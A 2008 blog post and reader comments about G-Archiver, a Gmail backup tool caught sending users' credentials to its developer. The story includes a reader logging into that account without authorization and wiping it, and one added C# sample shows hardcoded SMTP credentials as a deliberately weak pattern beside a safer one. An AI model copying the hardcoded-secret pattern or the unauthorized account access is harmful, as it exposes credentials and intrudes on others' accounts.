A Question of Programming Ethics

March 7, 2008

From the ACM Code of Ethics:

As an ACM member I will
  1. Contribute to society and human well-being.
  2. Avoid harm to others.
  3. Be honest and trustworthy.
  4. Be fair and take action not to discriminate.
  5. Honor property rights including copyrights and patents.
  6. Give proper credit for intellectual property.
  7. Respect the privacy of others.
  8. Honor confidentiality.

It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:

I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.

It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends an email with their username and password to his personal email box! Having just entered my own information I became concerned.

I opened up a browser and logged in to gmail using his account information. It still worked.

[Screenshot: gmail password thief]

Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted Google to erase this account as I didn't see a way to delete it myself.

I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.

Posted by Jeff Atwood
322 Comments

MateMedia is a legitimate company and we are absolutely horrified that this has occurred.

We have removed from our websites all links to the software, and will be requesting any download sites that are hosting the software to remove it immediately.

We are in the process of notifying our customers, and we're investigating this matter with our software development team.

Russ on March 8, 2008 9:16 AM

I think the issue here is not ethics; we're talking about unlawful behavior. That guy should be prosecuted.

Regards

Jorge Diaz Tambley on March 8, 2008 9:22 AM

Didn't Dustin email all the affected users to warn them to change their passwords?

I was thinking that too.

I hate to add to this long list of comments, but I can't help but notice this:
client.EnableSsl = true;
Irony anyone?

SmoothPorcupine on March 8, 2008 9:25 AM

What everyone seems to be missing is the fact that through g-mail you can easily set up a filter to forward all in-coming e-mail to another e-mail address without marking it read. So deleting all of the e-mails probably did absolutely nothing. Plus the fact that this guy could be using his own program to archive all of the e-mails he got with the usernames/passwords.

I think that Dustin Brooks' heart was in the right place, but the best thing would have been to immediately change the password, and then go into "contacts" and click "select all" and send a warning e-mail to everyone (gmail automatically adds a contact for anyone that e-mails you). Then to notify Google, leaving the e-mails intact as evidence (since you already changed the password, the guy can no longer get into the account, so the e-mails don't need to be deleted).

Despite that, I think that Dustin did a great thing, and I'm glad he also made an effort to get the word out by sending the story to a well known blog like this one.

I made the mistake of telling Facebook's Friend Finder my password, and then realized how dumb it was and changed it to a pass-phrase that I will never share with anyone/anything except the gmail sign in page. I think Jeff has done a great job in championing proper password practices.

As a programmer, I'm ashamed to say that I never really thought about how I was storing my users' passwords until after reading a few posts on this blog. However my boss unfortunately will not allow me to encrypt users' passwords because he says that "we don't store any private data, and we want password recovery to be instant and easy". So we use pathetic secret questions/answers to "verify" them and then reveal to them their password in plain text right there on the webpage if they forgot it. It makes me sick. Unfortunately, I don't have a choice...

I am interested to hear any further details on what happens with this story if Google ever tells Dustin if anything ever came of this...

Chris on March 8, 2008 9:32 AM

"The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice before working on weapons and devices that we know will kill others."

If we consider those around us "equal in worth", where worth is the capacity to create, to dream, to love, etc, we also have to consider them equal to us in their capacity to invent ways to kill us. To the extent that a human is capable of good, he or she is also capable of evil.

"However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies."

I completely agree with your principles, but any serious set of ethics has to render unto Caesar what is Caesar's.

ben on March 8, 2008 9:45 AM

This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks:
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?

Dave on March 8, 2008 10:05 AM

@A Programmer

The perpetual nature of US copyrights (70 years after the death of the creator plus however many years Disney wants added so they can keep Mickey Mouse out of the public domain) is the major problem with copyright law. I have no problem with using copyright to protect software; it worked for many years, it prevents wholesale theft while allowing independent invention.

Patent law is a whole different animal. Traditionally patents were awarded only for physical devices - software was only considered if it was part of a physical device. Now any jackass can patent math and dance (software and "business processes" such as Washington Mutual's branch office layout.)

I don't see any problem with ACM's approach regardless of my view that software patents are an egregious misuse of the patent system. Like it or not, it's the law and the right way to handle the issue is to tell the profession to obey the law as part of a code of ethics while working to get bad law changed. ACM does the former; does it do the latter? Given its membership and (more importantly) sponsorship, can it?

Contrast ACM's code of ethics with those of LOPSA (The League of Professional System Administrators - see http://lopsa.org/CodeOfEthics):

"I will educate myself and others on relevant laws, regulations and policies regarding the performance of my duties."

and

"As an informed professional, I will encourage the writing and adoption of relevant policies and laws consistent with [the LOPSA Code of Ethics]."

That said, I've decompiled Java to examine vendor source code to debug problems and nudge vendors toward fixing our issues. I've done code reviews on proprietary code for which I have had access to the source and have reported bugs back to the vendor (specifically for software that estimated the effects of radioactive material releases to the public.) In that case, the vendor issued an advisory and sent us a fix within a few days.

Experience has convinced me that whether software is proprietary or open, the end user must have access to the source code otherwise they have no assurance that the code even works or that the vendor's agenda aligns with their own. Code is the instantiation of the author's agenda - if the author is a grifter or thief, it will show in the code.

Bob on March 8, 2008 10:17 AM

BTW: To Delete the GMail Account:
Open GMail Account
Click on Settings [upper right]
Click on Google Account Settings [near bottom]
Click on My Services - Edit
Click on Close account and delete all services and info associated with it
[didn't go any further than this]

Dave on March 8, 2008 10:18 AM

Even though Dustin Brooks got the email account deleted, thus destroying vital information, I think Jeff still has the screenshots. Isn't that enough to prosecute John Terry?

gogole on March 8, 2008 10:47 AM

Well done! Does somebody know who this John Terry is and his location?

Juanjo on March 8, 2008 10:56 AM

I have never understood how website features like "friend finder" got so successful that every social site has one version or another. Just the thought of a 3rd party site asking me for my username and password makes me cringe. But you'll be amazed at how even developers who are supposed to be savvy at things like this use these "friend finder" features.

Bart on March 8, 2008 11:10 AM

Registrant:
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: GARCHIVER.COM
Created on: 03-Apr-07
Expires on: 03-Apr-08

HOX on March 8, 2008 11:10 AM

Well done, Dustin!

Steven Fisher on March 8, 2008 11:11 AM

Registrant:
MateMedia, Inc.

POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MATEMEDIASOFT.COM
Created on: 08-Aug-03
Expires on: 08-Aug-08
Last Updated on: 07-Aug-07

Administrative Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Technical Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM


Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited

More on March 8, 2008 11:13 AM

This is precisely why I won't use "free" software that isn't open source or released by a "reputable" company.

haunches on March 8, 2008 11:13 AM

One name I did notice in the gmail screen cap in the contacts list is Pawel Lesnikowski. He's a writer of .NET components:

http://www.lesnikowski.com/

Maybe he might know this John Terry. This abuse of personal trust and privacy is appalling. I hope this site and application is flagged as a trojan and taken down by everyone in the shareware community.

Geoff Dalgas on March 8, 2008 11:25 AM

Dave -- if you think Dustin's ethics are the same as this other guy's, then you obviously don't really understand ethics all that well. There's nothing unethical about viewing source code of others (ripping it off is something else entirely), there's nothing unethical about stopping someone from harvesting identity information of others. Whatever ethical infractions might exist in using someone else's login information are well covered by the doctrine of double-effect.

Shmork on March 8, 2008 11:59 AM

I used a piece of software which has a demo mode for an online service. Probably in demo mode, the developer of the software was using his credentials, probably hardcoded in the software.

I realized, after using the software in demo mode, that if I opened the website (Gmail; yes, it was Google's API that the software uses) in a browser, I was logged into his Gmail automatically. I thought it was some issue with Google, but later realized it's because I used that software in demo mode and new cookies were in place.

Anyway, I informed the developer, never heard back. I don't use that software anymore for two reasons:

1) Don't want my Gmail cookies replaced by others
2) I don't feel good, if I unintentionally log into his account


-abdul

Abdul Qabiz on March 8, 2008 12:16 PM

Makes sense.

sqoosh on March 8, 2008 12:29 PM

On a related note... let's say I need to send emails through a gmail account from my C# program. This basically means there will be strings inside my source that contain the gmail username and password.

This is obviously bad, in the presence of Reflector. In the unmanaged world we could encrypt the strings using some encryption algorithm, and since the details of the encryption algorithm would be compiled to assembly nobody could tell what's going on. But in the managed world, the details of such an encrypting process are there for everyone to decompile, so it doesn't sound like that's going to work.

This _must_ be a solved problem, but I don't really know the keywords to use to find the solution...

Domenic on March 8, 2008 12:52 PM
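An added illustration of the point in Domenic's question above, written for this page and not taken from the post or from G-Archiver: a string literal in a managed assembly is recoverable by anyone with Reflector, so the developer's own Gmail credentials must never ship inside the program. The weak form is shown beside a hardened form that carries no developer secret and instead seals the running user's own credentials with DPAPI; it assumes .NET Framework 4.x on Windows with a reference to System.Security.dll, and the "ExampleMailer" folder, the entropy string and the class names are hypothetical.

```csharp
using System;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Security.Cryptography;   // ProtectedData lives in System.Security.dll
using System.Text;

// WEAK FORM: what Domenic describes and what G-Archiver shipped. These literals are
// emitted verbatim into the assembly's #US string heap, so Reflector (or `strings`)
// shows them as-is. "Encrypting" them in the same assembly does not help: the key
// and the decryption routine ship next to the ciphertext and decompile just as well.
static class WeakMailer
{
    const string DevUser = "developer@gmail.com";   // constructed placeholder; never do this
    const string DevPass = "developer-password";    // constructed placeholder; never do this

    public static void Send(string to, string subject, string body)
    {
        var client = new SmtpClient("smtp.gmail.com", 587);
        client.EnableSsl = true;                      // TLS protects the wire, not the binary
        client.Credentials = new NetworkCredential(DevUser, DevPass);
        client.Send(new MailMessage(DevUser, to, subject, body));
    }
}

// HARDENED FORM: the program carries no developer secret at all. The credentials belong
// to the person running it, are typed in by them, and are stored on their machine with
// DPAPI (CurrentUser scope), so only that Windows account can unseal them. They are
// sent to Gmail's SMTP server and nowhere else.
static class UserMailer
{
    // Hypothetical per-app location and extra entropy (assumptions, not from the page).
    static readonly string StorePath = Path.Combine(
        Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
        "ExampleMailer", "smtp.cred");
    static readonly byte[] Entropy = Encoding.UTF8.GetBytes("ExampleMailer/smtp/v1");

    // Called once, with values the user entered in the UI; the plaintext is wiped after sealing.
    public static void SaveCredentials(string user, string password)
    {
        byte[] plain = Encoding.UTF8.GetBytes(user + "\n" + password);
        byte[] blob = ProtectedData.Protect(plain, Entropy, DataProtectionScope.CurrentUser);
        Array.Clear(plain, 0, plain.Length);
        Directory.CreateDirectory(Path.GetDirectoryName(StorePath));
        File.WriteAllBytes(StorePath, blob);
    }

    static NetworkCredential LoadCredentials()
    {
        byte[] blob = File.ReadAllBytes(StorePath);
        byte[] plain = ProtectedData.Unprotect(blob, Entropy, DataProtectionScope.CurrentUser);
        string[] parts = Encoding.UTF8.GetString(plain).Split(new[] { '\n' }, 2);
        Array.Clear(plain, 0, plain.Length);
        if (parts.Length != 2) throw new InvalidDataException("credential store is corrupt");
        return new NetworkCredential(parts[0], parts[1]);
    }

    public static void Send(string to, string subject, string body)
    {
        NetworkCredential cred = LoadCredentials();
        using (var client = new SmtpClient("smtp.gmail.com", 587))
        {
            client.EnableSsl = true;              // STARTTLS on port 587
            client.UseDefaultCredentials = false; // set before Credentials, or it resets them
            client.Credentials = cred;            // the only place the password goes
            client.Send(new MailMessage(cred.UserName, to, subject, body));
        }
    }
}
```

On current Gmail accounts the value stored by SaveCredentials would be an application-specific password rather than the account password, since Google no longer accepts the account password for SMTP basic authentication.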

I must say, I love the comments about how if this were open source, this could never have happened.

Consider this:
1) I make some application
2) I package up the source code
3) I inject malicious code and compile said source code
4) I put both the 'clean' source and malicious binary files on (say) Sourceforge and mark it as GPL.

How many people, do you think, are going to actually check that the source and binaries match, or compile it themselves from source?

Open Source Software is not the answer to preventing this kind of abuse in trust.


As for the comments that this was possibly just debugging information let loose - take another look at the source code. It's pretty obvious that this is NOT just debugging info.

It's also unfortunate that Dustin probably broke several laws doing the right thing to protect these folks who had been exploited.

Will Hughes on March 9, 2008 1:25 AM

@ Justin Megawarne

Being entitled to viewing the source code doesn't help at all. There's no way to actually verify that the site in question actually uses the source code as-is. That's a huge misconception that people have about open source software, especially open source-based online apps.

People assume, "well, look, the source code is available, everything must be on the up and up." For all they know, the site is 100% malicious but using the same interface. Really, the only way to be safe with open source is to diligently read the code and then compile it yourself, or to trust the community distributing it. Of course, that's not an option when you're on someone else's site.

OAuth, OpenID, etc. are vitally important options. Of course, they're still not ultimately friendly enough. And in the case of OpenID, there's still a huge level of trust that has to be placed on the provider (since Joe Shmoe will not have his own web site).

It's already bad enough that email is the focal point of almost all of a person's services/usernames/passwords... and losing access to your email effectively terminates your online self. Sure, Google can be trusted with email, to a degree. That's not necessarily the issue. The issue is just how *EASY* it is for someone to get your email user/pass. Use any machine that has a keylogger (hardware or software) installed by a user or virus, and boom... everything you've ever done and use is in someone else's hands.

I suppose the only way to combat that is biometrics + some form of verification that relies on a floating, constantly changing password somehow. :S

Zm on March 9, 2008 1:32 AM

The worst thing is that now our dear Jeff (probably) won’t stop cheating but will become smarter covering his @ss while doing it.

rockordie on March 9, 2008 1:35 AM

@ Justin Megawarne

Oh, sorry, I re-read what you said. You meant a piece of software like G-Archiver. Of course, what you suggest wouldn't be fair or legally possible.

How 'bout this for an idea along those lines: a third-party that verifies software as "safe". It would be the BBB/Verisign of sorts for software. I suppose, the company or independent developer would then pay the verification service based on the complexity/length of the code. The service would verify various points, ensuring the software won't screw a user, then give a quality seal w/ lookup online, as well as the hash or whatever to verify it's the same software.

That would allow developers to keep their intellectual property and get their software used more. And that'd be great for users as well. Oh, and great for a business if the costs can be worked out.

I don't know, maybe things like that exist (probably).

Zm on March 9, 2008 1:51 AM

We all applaud DB for doing what, in the end, is right.

However his actions weren't (entirely) ethical. After DB logged onto gmail and verified that the code was stealing username/passwords he should have stopped. It can be argued that up to that point he couldn't know his assumptions were correct. There's often dead code, and the discovered code doing the emailing could have been 'test' code for all DB knew.

Additionally, using Lutz's Reflector isn't illegal. JT made no attempt at obfuscating his code, encrypting, signing, etc. No more illegal than using a screwdriver to open a tv set. Why do coders/politicians/police think that some legally magical properties are given to some binary output after being processed by a compiler?

However much I'm in favor of DB's actions, once he deleted the emails he's trashing evidence and exposing himself to prosecution/liability (in some countries at least). We cringe when an honest guy gets trashed because he was trying to do good.

If DB just changed the password that would have been OK, because all that does is prevent the malicious software from operating, and doesn't cause any long-lasting damage.

That said, I really doubt that DB thought out his actions once logging onto gmail. He reacted, probably like many of us would. I imagine being in that situation, freaking out, and doing the exact same thing as a knee-jerk reaction.

So save your harsh comments for JT instead, because he deserves them, as well as deserving prosecution.

tiger on March 9, 2008 1:56 AM

I'm lost trying to figure out the point of this article. Other than mentioning something vaguely smart and hand-wavily academic (like the ACM code of conduct), I don't spend my time reading Coding Horror to hear about simplistic disassembly of crude pieces of spyware; there are much better resources for that.

Deleting the email data in question was a really dumb knee-jerk reaction, although I trust that Google are well equipped to deal with this kind of stupidity.

For those just tuning in to this thing called the Internet, creating quasi-useful pieces of software that act as a conduit for malware is nothing new. Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

Given that GMail provide POP3 and IMAP access, I cannot understand why even a rookie technophile would go off in search of a specialist tool for archiving mail. For what it's worth, I use the excellent little mpop http://mpop.sf.net/ utility for backing up my GMail, although offlineimap http://software.complete.org/offlineimap works too.

David Wilson on March 9, 2008 3:02 AM

AFAIK, the information in the gmail account is not actually deleted, in the sense that Google could still recover it if they wanted to, although that would probably require a court order. It might be worth seeing if law enforcement wants to take an interest in this guy - it's not too late.

Zen419 on March 9, 2008 4:05 AM

Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

since 1908?

geoff on March 9, 2008 4:54 AM

@David Wilson,

How on earth can you compare FunWebProducts (which bundled basic, but irritating, adware - stupid pop up windows and toolbars) with a program coded to steal usernames and passwords?

Sam Spade on March 9, 2008 5:19 AM

If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

Matt on March 8, 2008 08:45 AM

Wow, that has to be the stupidest comment ever.

FaRsIdE on March 9, 2008 5:56 AM

Every snowflake of an avalanche proclaims its innocence...

grace on March 9, 2008 6:28 AM

There is no John Terry; from the password you can guess it's some Asian dude wannabe hacker, and the site you mentioned to download from is a bad site to download things from. Try download.com next time.

NOTE: It's not about programming ethics or programmers. There are good and bad people. And well, if everyone had ethics (bah humbug!) then the world would have been a better place and no one would create viruses, hack tools, root kits (Sony!) etc....

Lame post, I tell ya.

PS: Hope you don't censor this! (free right to opinion)

GlaB on March 9, 2008 6:29 AM

@Geri:

You can't port someone's opinion over from one thing to another. If I'm running software on my computer, I have a right to know what it does. The police only have a right to spy on people when they have reasonable grounds to believe it is necessary -- there's almost nobody who thinks that police should NEVER be allowed to read private mail; the only real argument is WHEN "there is a public safety imperative that overrides any privacy rebuttal."

Your argument is facile.

Andrew on March 9, 2008 6:34 AM

@Justin Megawarne

"This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash."

This is one reason that the police should be entitled to examine a citizen's emails and personal correspondence, without fear of legal backlash.

"There is an ethical imperative here that overrides any economic rebuttal."

There is a public safety imperative that overrides any privacy rebuttal.

I thought your arguments sounded familiar.

Geri on March 9, 2008 6:47 AM

Haha, this is probably one of the dumber identity thieves I've heard of. Why embed his own username and password and risk it being extracted when THE USER JUST ENTERED THEIR OWN SET? He could've just used theirs and sent an e-mail using those credentials! The only problem then is that an e-mail might appear in their sent folder (until he immediately deletes it).

Of course that wouldn't have prevented its detection. Assuming this is a .NET program (that's the only Reflector I know) there is no way to prevent decompiling unless you use one of those expensive scrambling/obfuscating programs (there might be a free/open source one as well, wouldn't surprise me, but I don't know of any ATM).

Dan on March 9, 2008 7:51 AM

(ironic mode:on)
I need my ex-girlfriend gmail password, it's very important! please send me it at my hotmail account.
Thanks
(ironic mode:off)

;-)

salsa on March 9, 2008 7:56 AM

It might have been more wise to datamine the usernames from his inbox, and do a mass-mailing to all of them telling them to change their password. You definitely did a good thing, though. Hopefully Google can take care of informing the users to change their passwords.

reid on March 9, 2008 8:27 AM

plug type='shameless'
As was already mentioned, you can easily backup your gmail with, say, thunderbird, in 5 easy steps:

http://blogoscoped.com/forum/22775-full.html#id24184

MSpreij on March 9, 2008 8:34 AM

Why do you need junk software like this when you can simply use **any** email client, via POP and backup your mail locally? It's not like yahoo or hotmail where you have to pay for POP access. Duh?!?

Matt on March 9, 2008 9:16 AM

This would never happen in the Linux world because the approvers of binary packages we download from our distribution vendor must first have access to the source code, and they review the source for malicious items like this. And on Ubuntu, this is doubly so because packages are reviewed by the Debian team, then by the Ubuntu team.

So, Windows users, you might want to start getting the source and compiling stuff yourself rather than using binary executables.

Volo Mike on March 9, 2008 9:58 AM

This is truly a sad story =( Us geeks are often privy to a LOT of very confidential, sensitive information, be it logins, financial data or even business plans. There is implicit trust as soon as people fire up your application, that trust should never be abused. It's unethical, immoral and excuse the language, but just makes you an a-hole!

Well done though Dustin for figuring it out and doing the right thing! Did anyone ever find out if he emailed the people that had been stung to get them to change their account information?

Hell of a good reason to fire up reflector on any shareware that you enter account information into..

Good job the idiot didn't have the brains to store his password in some sort of encrypted format! =D

Rob on March 9, 2008 10:02 AM

Before we point fingers of Linux vs. Windows and claim how you should have done this or that, we need to take a bit of action:

1). Everyone here should email abuse@godaddy.com and tell them that a site they've registered is doing something that is probably illegal. The site is registered by GoDaddy under the name of MateMedia:

Administrative Contact:
Inc., MateMedia hostmaster@matemediainc.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
(877) 309-7521

Next, if anyone of you know someone who has fallen for this, have them write a complaint to the Attorney General of Florida: http://myfloridalegal.com/contact. There is a complaint form: FILL THAT OUT! Don't just email the Attorney General, fill out the form at http://www.myfloridalegal.com/ConsumerComplaint.pdf.

They will track down this guy (easy enough to do with a few court orders) and go after him. He has committed fraud (especially since he's taken money for this program), electronic theft, and possible identity theft.

BTW, you might find this article of interest: http://www.quickregister.net/articles/customerservice/4_Customer_Service_Mistakes_Companies_Should_Avoid.html. Apparently, his name here is "Russ Mate".

Here's a few more URLS http://www.russmate.com/
http://mediamateinc,com

David W. on March 9, 2008 10:12 AM

Might I suggest that you change the title of this post to something like "Don't use G-Archiver" so that it shows up as an immediate clear warning in search results. It already shows up as #3 in search results for g-archiver, but g-archiver itself is #1.

Richard Schwartz on March 9, 2008 10:13 AM

I am in no way defending what happened here, but in all honesty blaming shareware is not really fair. If anyone had gone to the "company's" site and taken a look at it, they probably never would have installed it being how shady it looks. That's just common sense, I am sorry.

There are legitimate companies out there that get listed on shareware sites, be it from themselves or from affiliates.

Matthew R. Miller on March 9, 2008 10:40 AM

Shocking indeed, is there a way to announce and create awareness so in future other innocent users don't fall into this trap ?

Ajo Paul on March 9, 2008 10:43 AM

A few comments on Dustin Brooks' ethics:

Dustin Brooks did no wrong in using Reflector. There is nothing in the G-Archiver license that prohibits using Reflector in examining the source code.

Dustin Brooks took immediate action when he suspected that his Gmail address was stolen. Normally, you don't log onto someone else's account, but in this case, Dustin Brooks had immediate knowledge that his Gmail account information was stolen, and had to take immediate action to prevent theft.

Dustin Brooks saved thousands of people from getting their email addresses stolen by deleting them from this account. He has saved thousands more from getting their email stolen by deleting the account and locking it.

Saying Dustin Brooks acted unethically is like saying someone who runs into a burning building and saves a baby acted unethically because they didn't ring the doorbell and ask permission to enter and thus trespassed onto someone else's property.

The account in question was obviously used to steal email addresses from other people. Dustin Brooks' quick thinking saved them from having their accounts stolen.

There are two other things Dustin Brooks should do: If possible, contact these people and let them know their Gmail accounts might have been compromised. He should also contact Google and let them know about this account and contact the Attorney General's office to file a complaint.

As for Russ Mate who is shocked! shocked! that this happened on one of his accounts, why is the garchiver site still up and running? Certainly, you as the technical contact and registrar have the power to take this site off the air. If someone contacts you about g-archiver, are you willing to reveal the name of the client, so others can get in contact with them, or to be able to file charges against this client?

David W. on March 9, 2008 11:01 AM

Why did you link to the software as well? Gives it promotion.

Matthew R. Miller on March 9, 2008 11:22 AM

Count me in the "mostly did the right thing" camp:

- Reflector: does anyone who doesn't wear a suit really think "reading the directions" is a crime? (This doesn't pardon plagiarism or other unsavory *use* of what you see, but the act of looking?). No harm was done here.

- Google: I probably wouldn't have deleted the emails (given a few minutes to think about it). Best practice probably is:
1. Check for email forward.
2. Add email forward to auto-reply warning that their information is being compromised. Cc abuse@google.com (or some other suitable email)
3. If there's an easy way to auto-reply to existing victims, do the same for them.
4. Change the passwords, security keys, and whatever else I can find.
5. Send an email to abuse@google.com (or whatever email I find) *from that account* detailing the situation and actions taken.
6. Log out, and find a better way to backup email. :)

Everyone who can be informed is informed, perp is locked out - but if it turns out to be some massive misunderstanding *snicker* nothing irreversible has been done, and I am relatively anonymous (if someone decides to go all Gestapo on "the big bad hacker") Not bothering to contact police - Google'll do it if there's a chance of prosecution.

Suggestions?

Allen on March 10, 2008 2:23 AM

BTW, I have a small and OPENSOURCE Python script to backup your whole GMail account (inbox, archives, sent) in the standard mbox format.

You can review the source code yourself: There are only 23 lines of code.

http://sebsauvage.net/python/snyppets/index.html#archive_gmail

sebsauvage on March 10, 2008 2:29 AM

It looks like it really could have been a mistake:
http://www.garchiver.com/what-happened.htm

Since the method is called "TestConnection" this is even somewhat plausible. Seriously, I bet there are programmers here who have leaked their own credentials this way.

It's still pretty stupid, though... ugh.

Jess Sightler on March 10, 2008 2:56 AM

no

jeep on March 10, 2008 3:04 AM

"What happened was that a member of our development team had inserted coding used for testing G-Archiver in the debug version and forgot to delete it in the final release version."

Riiiiight...

Somehow I doubt that it takes a "development team" to write this piece of blatant malware.

DBrant on March 10, 2008 3:06 AM

I can only assume 'Dave' above ("it's unethical to act to prevent massive password theft") is either a blithering idiot, or a troll.

commenter on March 10, 2008 3:16 AM

HA! Yeah, it was just a mistake. That's why it's contained in a separate .dll named simply "SM" with only one class "Mail" which breaks the naming convention of the rest of the source. This class has a trivial constructor and one method, that Brian listed already. Anyway, if you'll notice in the method, it swallows the exception as well.

Now I gotta ask, what kind of test method swallows the exception? No my friends, this guy was trying to slide one under the rug so to speak. On the bright side I would assume he's being terminated and/or sued by the company that put up that chipper message about how it was all a mistake and despite their developer receiving thousands of email addresses and passwords they never notified a customer, rolled out an update, or updated the program itself.

My advice, if you used the program, change your password. Look for signs of identity theft, too. If you see them, you know where to point a finger, not at the developer either, at the company that released it. Secondly, never use any product from anyone even involved in this project again.

marr75 on March 10, 2008 3:17 AM

Accident my ass.

--------------------------------------------------------

What happened with G-Archiver?

It has come to our attention that I got caught stealing customer's Gmail account usernames and passwords.

It is urgent that you remove the current version of G-Archiver from your computer, and change your Gmail account password right away so that I can have plausible deniability.

What happened was that I inserted coding used for stealing G-Mail passwords in the debug version and decided it was a great idea so I didn't delete it in the final release version.

I sincerely apologize that I got caught and assure you that you weren't intended to find out about this.

We'll be releasing a new version that uses encryption, the .NET Obfuscator, and updates the account details found in version 1.0 (since I got locked out of my account). The new version will be available very soon. Download and tell your friends!

Nick on March 10, 2008 3:43 AM

I would like to pose a hypothetical situation for people to consider.

If some sort of potentially IMMEDIATE risk were occurring, like, say... I left my keys in a bus station, and a friend of mine saw someone that neither one of us knew, entering my house... there are some things I would like him to do.

1) Phone me - Dustin SHOULD have emailed everyone on the list, I agree... however, all of this information seems to be included in R/E line.. or the body...? In any event, it does not look like it would be as easy as clicking "forward", or anything else like that, it looks like 1700+ emails worth of cutting and pasting.

if the hypothetical friend of mine (i have no actual friends) who saw the intruder didn't have a cell phone, was out of time or dropped it and broke it, that's ok... I WOULD APPRECIATE SOMEONE ACTING IN MY BEST INTEREST. I would hope my friend would carry on to ...

2) Approach my house and ask what is going on - Dustin looked through the emails, and came to a conclusion which, I think we can all agree, was a no-brainer. The few reasons for having a list of this information are few, and none of them are in the best interest of the person doing it.

The chances that this list were an innocent list of names, for say demographics, are stupidly slim.

If my friend saw this person, say, stealing my stuff through the window... I would hope that they would take some action!

Incidentally, if Dustin approached the house and announced himself to ask what was going on, he may put himself in danger - or the intruder may run off with my keys. So, maybe the metaphor isn't PERFECT, but it's 5:45 am.

3) Inform the Authorities - Dustin informed Google. Nuff said. My friend should call the police, number one. However, that (in my mind) does NOT preclude ...

4) Act to save my stuff - Go in and knock the guy out! I certainly won't charge my friend with trespassing, and I don't think the cops in MY home town would charge him with assault. This would probably end up being one of those "He must've fallen while trying to escape and given himself 4 black eyes" cases.

Maybe the metaphor is wrong in several ways, since it doesn't really convey the immediacy of the threat... what if my friend saw this intruder, lighting a match and setting it to my sofa? What if the problem were so immediate, that every passing second could spell disaster?

To anyone who knows me;

If I see someone about to burn your house down, and the battery on my cell phone is dead, I will
a) Enter your home
b) grab a fire extinguisher
c) douse him with it
d) knock him upside the head with it until he stops moving
e) use your phone to call the cops

I would do so in the full knowledge that you could, for example, charge me with breaking and entering, or he could charge me with assault. Hopefully, he didn't die from the battery.

Oh, and by the way, Dustin... THANK YOU! Don't pay any attention to people who BS about legal crap. You did, IMHO, the right thing. Yeah, you didn't email the people, but in the heat of the moment... sometimes we forget to plug in our cell phones. Everyone on that list is grateful to you, I am sure. I sincerely hope you interrupted a bot and crashed a server when you did it.

Philip Snelgrove on March 10, 2008 3:48 AM

"and none of them are in the best interest of the person doing it."
=
"and none of them are in the best interest of the people whose information is so stored".

Philip Snelgrove on March 10, 2008 3:50 AM

I think the point here is not about ethics as you can never rely on someone else to have ethics... It's more about protecting your information.

Passing your username and password to anyone for anything should always be done extremely carefully.

On a similar theme, one of my pet hates is websites that require you to register on them. You create a username and password, they then immediately email you your credentials (so you don't forget them?).

I then kick myself for having used one of my current "strong" passwords for them to then send in an email in plain text! Where's the ethics in that?

Robin on March 10, 2008 4:09 AM

from the BrotherSoft site:
BrotherSoft.com is not only a website for software downloading, we also evaluate the software based on our established evaluation criteria, which is submitted by developer. And we will also give the software developer an honest opinion. Our original intention is that our evaluation could help the software developer provide a better one for their customers.
(auhuahuahuahuhauahuhauhauhau)

marco borgna on March 10, 2008 4:16 AM

even though we now know what is going on...someone broke the DMCA and needs to pay

this is bad - reverse engineering of code is protected under the DMCA

anonymous coward on March 10, 2008 4:20 AM

Haha! Slipped into a debug version? I don't recall exact dates but it was more than a year's worth of data possibly two.
Why on earth would you need to send a username and password to a gmail account to test a connection? This program has no reason to even store the usernames and passwords, at all. To test a connection, send the word "Test," I think it would have worked the same way.
I'll still defend my actions, had he managed to have google reset his password that data would have still been at risk and since I never heard back from Google (only automated responses that they got my message) I wasn't sure any action would be taken on their behalf.

Dustin on March 10, 2008 4:33 AM

Why on earth would this guy hard-code his password in the program? That doesn't make sense to me at all, you don't need it to send data to the account. Is this guy -really- stupid or are you, just maybe, not telling us the entire truth about how you got into his account :) .

